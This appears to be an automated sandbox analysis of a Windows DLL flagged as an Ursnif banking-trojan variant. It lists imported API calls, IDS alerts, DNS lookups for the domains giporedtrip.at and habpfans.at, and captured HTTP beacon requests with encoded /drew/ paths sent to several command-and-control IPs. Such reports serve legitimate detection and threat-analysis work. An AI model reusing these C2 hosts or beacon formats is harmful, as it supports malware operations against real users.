user32.dll | CreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
kernel32.dll | Sleep
oleaut32.dll | SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
ole32.dll | CoUninitialize, CoInitialize
oleaut32.dll | GetErrorInfo, SysFreeString
comctl32.dll | ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
Language of compilation system | Country where language is spoken
English | United States
Bulgarian | Bulgaria
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
01/26/22-17:03:29.526106 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49753 | 80 | 192.168.2.5 | 13.107.42.16
01/26/22-17:03:50.217694 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49758 | 80 | 192.168.2.5 | 194.76.226.200
01/26/22-17:04:11.131587 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49771 | 80 | 192.168.2.5 | 211.119.84.112
01/26/22-17:04:11.131587 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49771 | 80 | 192.168.2.5 | 211.119.84.112
01/26/22-17:04:32.817920 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49781 | 80 | 192.168.2.5 | 41.41.255.235
01/26/22-17:04:53.808751 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49812 | 80 | 192.168.2.5 | 31.214.157.187
01/26/22-17:04:53.808751 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49812 | 80 | 192.168.2.5 | 31.214.157.187
01/26/22-17:05:14.219179 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49814 | 80 | 192.168.2.5 | 13.107.43.16
01/26/22-17:05:55.173450 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49825 | 80 | 192.168.2.5 | 181.129.180.251
01/26/22-17:06:16.920281 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49827 | 80 | 192.168.2.5 | 61.36.14.230
01/26/22-17:06:38.188650 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49828 | 80 | 192.168.2.5 | 31.214.157.187
01/26/22-17:06:59.014573 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49829 | 80 | 192.168.2.5 | 13.107.43.16
01/26/22-17:06:59.014573 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49829 | 80 | 192.168.2.5 | 13.107.43.16
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 26, 2022 17:03:50.196054935 CET | 49758 | 80 | 192.168.2.5 | 194.76.226.200
Jan 26, 2022 17:03:50.216969967 CET | 80 | 49758 | 194.76.226.200 | 192.168.2.5
Jan 26, 2022 17:03:50.217222929 CET | 49758 | 80 | 192.168.2.5 | 194.76.226.200
Jan 26, 2022 17:03:50.217694044 CET | 49758 | 80 | 192.168.2.5 | 194.76.226.200
Jan 26, 2022 17:03:50.240555048 CET | 80 | 49758 | 194.76.226.200 | 192.168.2.5
Jan 26, 2022 17:03:50.485863924 CET | 80 | 49758 | 194.76.226.200 | 192.168.2.5
Jan 26, 2022 17:03:50.527489901 CET | 49758 | 80 | 192.168.2.5 | 194.76.226.200
Jan 26, 2022 17:04:10.823165894 CET | 49771 | 80 | 192.168.2.5 | 211.119.84.112
Jan 26, 2022 17:04:11.131019115 CET | 80 | 49771 | 211.119.84.112 | 192.168.2.5
Jan 26, 2022 17:04:11.131146908 CET | 49771 | 80 | 192.168.2.5 | 211.119.84.112
Jan 26, 2022 17:04:11.131587029 CET | 49771 | 80 | 192.168.2.5 | 211.119.84.112
Jan 26, 2022 17:04:11.641944885 CET | 80 | 49771 | 211.119.84.112 | 192.168.2.5
Jan 26, 2022 17:04:12.363171101 CET | 80 | 49771 | 211.119.84.112 | 192.168.2.5
Jan 26, 2022 17:04:12.363260984 CET | 80 | 49771 | 211.119.84.112 | 192.168.2.5
Jan 26, 2022 17:04:12.363360882 CET | 49771 | 80 | 192.168.2.5 | 211.119.84.112
Jan 26, 2022 17:04:12.363540888 CET | 49771 | 80 | 192.168.2.5 | 211.119.84.112
Jan 26, 2022 17:04:12.671621084 CET | 80 | 49771 | 211.119.84.112 | 192.168.2.5
Jan 26, 2022 17:04:32.723215103 CET | 49781 | 80 | 192.168.2.5 | 41.41.255.235
Jan 26, 2022 17:04:32.817071915 CET | 80 | 49781 | 41.41.255.235 | 192.168.2.5
Jan 26, 2022 17:04:32.817342997 CET | 49781 | 80 | 192.168.2.5 | 41.41.255.235
Jan 26, 2022 17:04:32.817919970 CET | 49781 | 80 | 192.168.2.5 | 41.41.255.235
Jan 26, 2022 17:04:33.109745026 CET | 80 | 49781 | 41.41.255.235 | 192.168.2.5
Jan 26, 2022 17:04:33.531102896 CET | 80 | 49781 | 41.41.255.235 | 192.168.2.5
Jan 26, 2022 17:04:33.531539917 CET | 80 | 49781 | 41.41.255.235 | 192.168.2.5
Jan 26, 2022 17:04:33.531630993 CET | 49781 | 80 | 192.168.2.5 | 41.41.255.235
Jan 26, 2022 17:04:33.531966925 CET | 49781 | 80 | 192.168.2.5 | 41.41.255.235
Jan 26, 2022 17:04:33.613989115 CET | 80 | 49781 | 41.41.255.235 | 192.168.2.5
Jan 26, 2022 17:04:53.780751944 CET | 49812 | 80 | 192.168.2.5 | 31.214.157.187
Jan 26, 2022 17:04:53.807960033 CET | 80 | 49812 | 31.214.157.187 | 192.168.2.5
Jan 26, 2022 17:04:53.808163881 CET | 49812 | 80 | 192.168.2.5 | 31.214.157.187
Jan 26, 2022 17:04:53.808751106 CET | 49812 | 80 | 192.168.2.5 | 31.214.157.187
Jan 26, 2022 17:04:53.835407972 CET | 80 | 49812 | 31.214.157.187 | 192.168.2.5
Jan 26, 2022 17:04:54.068263054 CET | 80 | 49812 | 31.214.157.187 | 192.168.2.5
Jan 26, 2022 17:04:54.110872984 CET | 49812 | 80 | 192.168.2.5 | 31.214.157.187
Jan 26, 2022 17:04:55.488312960 CET | 80 | 49758 | 194.76.226.200 | 192.168.2.5
Jan 26, 2022 17:04:55.489257097 CET | 49758 | 80 | 192.168.2.5 | 194.76.226.200
Jan 26, 2022 17:04:55.489376068 CET | 49758 | 80 | 192.168.2.5 | 194.76.226.200
Jan 26, 2022 17:04:55.509185076 CET | 80 | 49758 | 194.76.226.200 | 192.168.2.5
Jan 26, 2022 17:05:19.442369938 CET | 49812 | 80 | 192.168.2.5 | 31.214.157.187
Jan 26, 2022 17:05:19.469677925 CET | 80 | 49812 | 31.214.157.187 | 192.168.2.5
Jan 26, 2022 17:05:19.469788074 CET | 49812 | 80 | 192.168.2.5 | 31.214.157.187
Jan 26, 2022 17:05:34.284610987 CET | 49816 | 80 | 192.168.2.5 | 194.76.226.200
Jan 26, 2022 17:05:34.305545092 CET | 80 | 49816 | 194.76.226.200 | 192.168.2.5
Jan 26, 2022 17:05:34.307151079 CET | 49816 | 80 | 192.168.2.5 | 194.76.226.200
Jan 26, 2022 17:05:34.308445930 CET | 49816 | 80 | 192.168.2.5 | 194.76.226.200
Jan 26, 2022 17:05:34.328700066 CET | 80 | 49816 | 194.76.226.200 | 192.168.2.5
Jan 26, 2022 17:05:34.582305908 CET | 80 | 49816 | 194.76.226.200 | 192.168.2.5
Jan 26, 2022 17:05:34.735786915 CET | 49816 | 80 | 192.168.2.5 | 194.76.226.200
Jan 26, 2022 17:05:54.993796110 CET | 49825 | 80 | 192.168.2.5 | 181.129.180.251
Jan 26, 2022 17:05:55.171062946 CET | 80 | 49825 | 181.129.180.251 | 192.168.2.5
Jan 26, 2022 17:05:55.171247959 CET | 49825 | 80 | 192.168.2.5 | 181.129.180.251
Jan 26, 2022 17:05:55.173449993 CET | 49825 | 80 | 192.168.2.5 | 181.129.180.251
Jan 26, 2022 17:05:55.585179090 CET | 80 | 49825 | 181.129.180.251 | 192.168.2.5
Jan 26, 2022 17:05:56.107831001 CET | 80 | 49825 | 181.129.180.251 | 192.168.2.5
Jan 26, 2022 17:05:56.107940912 CET | 80 | 49825 | 181.129.180.251 | 192.168.2.5
Jan 26, 2022 17:05:56.108086109 CET | 49825 | 80 | 192.168.2.5 | 181.129.180.251
Jan 26, 2022 17:05:56.108222008 CET | 49825 | 80 | 192.168.2.5 | 181.129.180.251
Jan 26, 2022 17:05:56.284883976 CET | 80 | 49825 | 181.129.180.251 | 192.168.2.5
Jan 26, 2022 17:06:16.600522995 CET | 49827 | 80 | 192.168.2.5 | 61.36.14.230
Jan 26, 2022 17:06:16.919651031 CET | 80 | 49827 | 61.36.14.230 | 192.168.2.5
Jan 26, 2022 17:06:16.919747114 CET | 49827 | 80 | 192.168.2.5 | 61.36.14.230
Jan 26, 2022 17:06:16.920280933 CET | 49827 | 80 | 192.168.2.5 | 61.36.14.230
Jan 26, 2022 17:06:17.439112902 CET | 80 | 49827 | 61.36.14.230 | 192.168.2.5
Jan 26, 2022 17:06:18.136353016 CET | 80 | 49827 | 61.36.14.230 | 192.168.2.5
Jan 26, 2022 17:06:18.136398077 CET | 80 | 49827 | 61.36.14.230 | 192.168.2.5
Jan 26, 2022 17:06:18.136567116 CET | 49827 | 80 | 192.168.2.5 | 61.36.14.230
Jan 26, 2022 17:06:18.136715889 CET | 49827 | 80 | 192.168.2.5 | 61.36.14.230
Jan 26, 2022 17:06:18.455836058 CET | 80 | 49827 | 61.36.14.230 | 192.168.2.5
Jan 26, 2022 17:06:38.157824993 CET | 49828 | 80 | 192.168.2.5 | 31.214.157.187
Jan 26, 2022 17:06:38.188126087 CET | 80 | 49828 | 31.214.157.187 | 192.168.2.5
Jan 26, 2022 17:06:38.188208103 CET | 49828 | 80 | 192.168.2.5 | 31.214.157.187
Jan 26, 2022 17:06:38.188649893 CET | 49828 | 80 | 192.168.2.5 | 31.214.157.187
Jan 26, 2022 17:06:38.218698025 CET | 80 | 49828 | 31.214.157.187 | 192.168.2.5
Jan 26, 2022 17:06:38.456873894 CET | 80 | 49828 | 31.214.157.187 | 192.168.2.5
Jan 26, 2022 17:06:38.508755922 CET | 49828 | 80 | 192.168.2.5 | 31.214.157.187
Jan 26, 2022 17:06:39.579426050 CET | 80 | 49816 | 194.76.226.200 | 192.168.2.5
Jan 26, 2022 17:06:39.579612017 CET | 49816 | 80 | 192.168.2.5 | 194.76.226.200
Jan 26, 2022 17:06:39.787955999 CET | 49816 | 80 | 192.168.2.5 | 194.76.226.200
Jan 26, 2022 17:06:39.808128119 CET | 80 | 49816 | 194.76.226.200 | 192.168.2.5
Jan 26, 2022 17:07:09.449675083 CET | 49828 | 80 | 192.168.2.5 | 31.214.157.187
Jan 26, 2022 17:07:09.480206013 CET | 80 | 49828 | 31.214.157.187 | 192.168.2.5
Jan 26, 2022 17:07:09.482753038 CET | 49828 | 80 | 192.168.2.5 | 31.214.157.187
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 26, 2022 17:04:10.702095032 CET | 63183 | 53 | 192.168.2.5 | 8.8.8.8
Jan 26, 2022 17:04:10.821247101 CET | 53 | 63183 | 8.8.8.8 | 192.168.2.5
Jan 26, 2022 17:04:32.537123919 CET | 56969 | 53 | 192.168.2.5 | 8.8.8.8
Jan 26, 2022 17:04:32.720880985 CET | 53 | 56969 | 8.8.8.8 | 192.168.2.5
Jan 26, 2022 17:05:54.678286076 CET | 63732 | 53 | 192.168.2.5 | 8.8.8.8
Jan 26, 2022 17:05:54.987817049 CET | 53 | 63732 | 8.8.8.8 | 192.168.2.5
Jan 26, 2022 17:06:16.351515055 CET | 54450 | 53 | 192.168.2.5 | 8.8.8.8
Jan 26, 2022 17:06:16.595956087 CET | 53 | 54450 | 8.8.8.8 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jan 26, 2022 17:04:10.702095032 CET | 192.168.2.5 | 8.8.8.8 | 0xb2e | Standard query (0) | giporedtrip.at | A (IP address) | IN (0x0001)
Jan 26, 2022 17:04:32.537123919 CET | 192.168.2.5 | 8.8.8.8 | 0x72f | Standard query (0) | habpfans.at | A (IP address) | IN (0x0001)
Jan 26, 2022 17:05:54.678286076 CET | 192.168.2.5 | 8.8.8.8 | 0xdb34 | Standard query (0) | giporedtrip.at | A (IP address) | IN (0x0001)
Jan 26, 2022 17:06:16.351515055 CET | 192.168.2.5 | 8.8.8.8 | 0x5295 | Standard query (0) | habpfans.at | A (IP address) | IN (0x0001)
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jan 26, 2022 17:04:10.821247101 CET | 8.8.8.8 | 192.168.2.5 | 0xb2e | No error (0) | giporedtrip.at | | 211.119.84.112 | A (IP address) | IN (0x0001)
Jan 26, 2022 17:04:10.821247101 CET | 8.8.8.8 | 192.168.2.5 | 0xb2e | No error (0) | giporedtrip.at | | 183.78.205.92 | A (IP address) | IN (0x0001)
Jan 26, 2022 17:04:10.821247101 CET | 8.8.8.8 | 192.168.2.5 | 0xb2e | No error (0) | giporedtrip.at | | 210.92.250.133 | A (IP address) | IN (0x0001)
Jan 26, 2022 17:04:10.821247101 CET | 8.8.8.8 | 192.168.2.5 | 0xb2e | No error (0) | giporedtrip.at | | 187.232.235.234 | A (IP address) | IN (0x0001)
Jan 26, 2022 17:04:10.821247101 CET | 8.8.8.8 | 192.168.2.5 | 0xb2e | No error (0) | giporedtrip.at | | 183.100.39.157 | A (IP address) | IN (0x0001)
Jan 26, 2022 17:04:10.821247101 CET | 8.8.8.8 | 192.168.2.5 | 0xb2e | No error (0) | giporedtrip.at | | 203.228.9.102 | A (IP address) | IN (0x0001)
Jan 26, 2022 17:04:10.821247101 CET | 8.8.8.8 | 192.168.2.5 | 0xb2e | No error (0) | giporedtrip.at | | 41.41.255.235 | A (IP address) | IN (0x0001)
Jan 26, 2022 17:04:10.821247101 CET | 8.8.8.8 | 192.168.2.5 | 0xb2e | No error (0) | giporedtrip.at | | 186.6.45.193 | A (IP address) | IN (0x0001)
Jan 26, 2022 17:04:10.821247101 CET | 8.8.8.8 | 192.168.2.5 | 0xb2e | No error (0) | giporedtrip.at | | 197.44.54.172 | A (IP address) | IN (0x0001)
Jan 26, 2022 17:04:10.821247101 CET | 8.8.8.8 | 192.168.2.5 | 0xb2e | No error (0) | giporedtrip.at | | 151.251.30.69 | A (IP address) | IN (0x0001)
Jan 26, 2022 17:04:32.720880985 CET | 8.8.8.8 | 192.168.2.5 | 0x72f | No error (0) | habpfans.at | | 41.41.255.235 | A (IP address) | IN (0x0001)
Jan 26, 2022 17:04:32.720880985 CET | 8.8.8.8 | 192.168.2.5 | 0x72f | No error (0) | habpfans.at | | 186.6.45.193 | A (IP address) | IN (0x0001)
Jan 26, 2022 17:04:32.720880985 CET | 8.8.8.8 | 192.168.2.5 | 0x72f | No error (0) | habpfans.at | | 197.44.54.172 | A (IP address) | IN (0x0001)
Jan 26, 2022 17:04:32.720880985 CET | 8.8.8.8 | 192.168.2.5 | 0x72f | No error (0) | habpfans.at | | 151.251.30.69 | A (IP address) | IN (0x0001)
Jan 26, 2022 17:04:32.720880985 CET | 8.8.8.8 | 192.168.2.5 | 0x72f | No error (0) | habpfans.at | | 211.119.84.112 | A (IP address) | IN (0x0001)
Jan 26, 2022 17:04:32.720880985 CET | 8.8.8.8 | 192.168.2.5 | 0x72f | No error (0) | habpfans.at | | 183.78.205.92 | A (IP address) | IN (0x0001)
Jan 26, 2022 17:04:32.720880985 CET | 8.8.8.8 | 192.168.2.5 | 0x72f | No error (0) | habpfans.at | | 210.92.250.133 | A (IP address) | IN (0x0001)
Jan 26, 2022 17:04:32.720880985 CET | 8.8.8.8 | 192.168.2.5 | 0x72f | No error (0) | habpfans.at | | 187.232.235.234 | A (IP address) | IN (0x0001)
Jan 26, 2022 17:04:32.720880985 CET | 8.8.8.8 | 192.168.2.5 | 0x72f | No error (0) | habpfans.at | | 183.100.39.157 | A (IP address) | IN (0x0001)
Jan 26, 2022 17:04:32.720880985 CET | 8.8.8.8 | 192.168.2.5 | 0x72f | No error (0) | habpfans.at | | 203.228.9.102 | A (IP address) | IN (0x0001)
Jan 26, 2022 17:05:54.987817049 CET | 8.8.8.8 | 192.168.2.5 | 0xdb34 | No error (0) | giporedtrip.at | | 181.129.180.251 | A (IP address) | IN (0x0001)
Jan 26, 2022 17:05:54.987817049 CET | 8.8.8.8 | 192.168.2.5 | 0xdb34 | No error (0) | giporedtrip.at | | 222.236.49.124 | A (IP address) | IN (0x0001)
Jan 26, 2022 17:05:54.987817049 CET | 8.8.8.8 | 192.168.2.5 | 0xdb34 | No error (0) | giporedtrip.at | | 187.212.179.214 | A (IP address) | IN (0x0001)
Jan 26, 2022 17:05:54.987817049 CET | 8.8.8.8 | 192.168.2.5 | 0xdb34 | No error (0) | giporedtrip.at | | 95.104.121.111 | A (IP address) | IN (0x0001)
Jan 26, 2022 17:05:54.987817049 CET | 8.8.8.8 | 192.168.2.5 | 0xdb34 | No error (0) | giporedtrip.at | | 178.31.236.98 | A (IP address) | IN (0x0001)
Jan 26, 2022 17:05:54.987817049 CET | 8.8.8.8 | 192.168.2.5 | 0xdb34 | No error (0) | giporedtrip.at | | 31.167.149.141 | A (IP address) | IN (0x0001)
Jan 26, 2022 17:05:54.987817049 CET | 8.8.8.8 | 192.168.2.5 | 0xdb34 | No error (0) | giporedtrip.at | | 58.235.189.190 | A (IP address) | IN (0x0001)
Jan 26, 2022 17:05:54.987817049 CET | 8.8.8.8 | 192.168.2.5 | 0xdb34 | No error (0) | giporedtrip.at | | 61.36.14.230 | A (IP address) | IN (0x0001)
Jan 26, 2022 17:05:54.987817049 CET | 8.8.8.8 | 192.168.2.5 | 0xdb34 | No error (0) | giporedtrip.at | | 14.51.96.70 | A (IP address) | IN (0x0001)
Jan 26, 2022 17:05:54.987817049 CET | 8.8.8.8 | 192.168.2.5 | 0xdb34 | No error (0) | giporedtrip.at | | 180.69.193.102 | A (IP address) | IN (0x0001)
Jan 26, 2022 17:06:16.595956087 CET | 8.8.8.8 | 192.168.2.5 | 0x5295 | No error (0) | habpfans.at | | 61.36.14.230 | A (IP address) | IN (0x0001)
Jan 26, 2022 17:06:16.595956087 CET | 8.8.8.8 | 192.168.2.5 | 0x5295 | No error (0) | habpfans.at | | 14.51.96.70 | A (IP address) | IN (0x0001)
Jan 26, 2022 17:06:16.595956087 CET | 8.8.8.8 | 192.168.2.5 | 0x5295 | No error (0) | habpfans.at | | 180.69.193.102 | A (IP address) | IN (0x0001)
Jan 26, 2022 17:06:16.595956087 CET | 8.8.8.8 | 192.168.2.5 | 0x5295 | No error (0) | habpfans.at | | 181.129.180.251 | A (IP address) | IN (0x0001)
Jan 26, 2022 17:06:16.595956087 CET | 8.8.8.8 | 192.168.2.5 | 0x5295 | No error (0) | habpfans.at | | 222.236.49.124 | A (IP address) | IN (0x0001)
Jan 26, 2022 17:06:16.595956087 CET | 8.8.8.8 | 192.168.2.5 | 0x5295 | No error (0) | habpfans.at | | 187.212.179.214 | A (IP address) | IN (0x0001)
Jan 26, 2022 17:06:16.595956087 CET | 8.8.8.8 | 192.168.2.5 | 0x5295 | No error (0) | habpfans.at | | 95.104.121.111 | A (IP address) | IN (0x0001)
Jan 26, 2022 17:06:16.595956087 CET | 8.8.8.8 | 192.168.2.5 | 0x5295 | No error (0) | habpfans.at | | 178.31.236.98 | A (IP address) | IN (0x0001)
Jan 26, 2022 17:06:16.595956087 CET | 8.8.8.8 | 192.168.2.5 | 0x5295 | No error (0) | habpfans.at | | 31.167.149.141 | A (IP address) | IN (0x0001)
Jan 26, 2022 17:06:16.595956087 CET | 8.8.8.8 | 192.168.2.5 | 0x5295 | No error (0) | habpfans.at | | 58.235.189.190 | A (IP address) | IN (0x0001)
                        • 194.76.226.200
                        • giporedtrip.at
                        • habpfans.at
                        • 31.214.157.187
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.5 | 49758 | 194.76.226.200 | 80 | C:\Windows\System32\loaddll32.exe
Timestamp | kBytes transferred | Direction | Data
Jan 26, 2022 17:03:50.217694044 CET | 1190 | OUT | GET /drew/ozC7eSUmzahvYkYKrp/EnTXsLZQu/ZxwfzvyOea6Ms_2FcWiK/QVPuXmRecwMBmPtS2pP/K1YuqB0TTP3PJ7dc3csdFA/1Ac_2BGJ3ahfL/ClNkrX58/ZDofYbeDbIVvrUisO8PwbQv/pc3vAH6GWF/x_2B4_2BbH_2B0wxz/YCHkmZmDbaCX/aMf9JRtYupc/_2Ben2gyoQcqJb/gP1jDokjfsnRCuX4LwXIc/R6CnFb_2FUwS1dKT/G7Z9QUvFXshW5HS/y.jlk HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
Host: 194.76.226.200
Jan 26, 2022 17:03:50.485863924 CET | 1191 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 26 Jan 2022 16:03:50 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 548
Connection: keep-alive
Vary: Accept-Encoding
                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.5 | 49771 | 211.119.84.112 | 80 | C:\Windows\System32\loaddll32.exe
Timestamp | kBytes transferred | Direction | Data
Jan 26, 2022 17:04:11.131587029 CET | 8224 | OUT | GET /drew/CNAO_2FMqt2bQnnFTS9A/gZCx4lwGHYQjpKz_2Bo/eC3Q_2B6RQnBEorg_2FJk6/uEN67LHG_2FS5/_2BBd1X9/aVPauq0optO45rzbpdCQm0T/aYIRRNsEBo/KjgLaOYvR_2BgwzfQ/25S5OlQYXnss/XWKrlvnyLdL/zvJbW2nKGtMp_2/BhAqVJaOXmJzkoWYA4_2B/1sUQfL4pghiYPQ_2/Bk4zNXCpOm9uy6W/_2FwvvWoJCQywtXfuj/zSz8jbk7z4_2FaKsy/ujc.jlk HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
Host: giporedtrip.at
Jan 26, 2022 17:04:12.363171101 CET | 11882 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 26 Jan 2022 16:04:12 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 548
Connection: close
Vary: Accept-Encoding
                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                        Session ID: 2 | Source IP: 192.168.2.5 | Source Port: 49781 | Destination IP: 41.41.255.235 | Destination Port: 80 | Process: C:\Windows\System32\loaddll32.exe
                        Timestamp: Jan 26, 2022 17:04:32.817919970 CET | kBytes transferred: 17822 | Direction: OUT | Data:
                        GET /drew/5tHE_2Fl/pXBoYLIb7sXj6_2FbgEdP7S/1g8RiyhGmo/7FzHWL9Gm5Pao_2Bw/5oh73gE4juwn/wLkUkA7sRnm/cso3yuTSujNtgI/CMmvYVa7e4KaoltzEmBTc/sgUl10rzE9jSORq1/rqqMvEmtzS52b3S/MwqSqUIn0qJ41lN07l/ltNVceIDT/qjCtCMmp_2FbkkqAoDDI/2nZPBTOmmpjaMrj1ust/QMCPjE0wKPGXBQrFS0WE_2/B3SVbiens/K.jlk HTTP/1.1
                        Cache-Control: no-cache
                        Connection: Keep-Alive
                        Pragma: no-cache
                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                        Host: habpfans.at
                        Timestamp: Jan 26, 2022 17:04:33.531102896 CET | kBytes transferred: 17823 | Direction: IN | Data:
                        HTTP/1.1 404 Not Found
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Wed, 26 Jan 2022 16:04:33 GMT
                        Content-Type: text/html; charset=utf-8
                        Content-Length: 548
                        Connection: close
                        Vary: Accept-Encoding
                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                        Session ID: 3 | Source IP: 192.168.2.5 | Source Port: 49812 | Destination IP: 31.214.157.187 | Destination Port: 80 | Process: C:\Windows\System32\loaddll32.exe
                        Timestamp: Jan 26, 2022 17:04:53.808751106 CET | kBytes transferred: 17909 | Direction: OUT | Data:
                        GET /drew/n9Q8SXORQfxecr/MW5_2Fu9_2Bgocr6670ju/D1JJTVEHrWL1TxqL/xGoJ_2FQlD36_2B/GkPBzrjzE3l7JBLY9O/1EFPlHsMW/m5HxfuFe9CAmeE3Sv9mV/WruJ_2B6bq6RWMaARg5/48WJvcYD9cWVaImnFjKYnp/qqfI438hlaFuV/Cz10Llo3/y28DCtREPMb5OZnUZKj2hAx/fvbD6E0k2X/xMHWSCI5symguz2Bp/FnCO_2F0QOq8/vwhEVJIxW/5.jlk HTTP/1.1
                        Cache-Control: no-cache
                        Connection: Keep-Alive
                        Pragma: no-cache
                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                        Host: 31.214.157.187
                        Timestamp: Jan 26, 2022 17:04:54.068263054 CET | kBytes transferred: 17910 | Direction: IN | Data:
                        HTTP/1.1 404 Not Found
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Wed, 26 Jan 2022 16:04:54 GMT
                        Content-Type: text/html; charset=utf-8
                        Content-Length: 548
                        Connection: keep-alive
                        Vary: Accept-Encoding
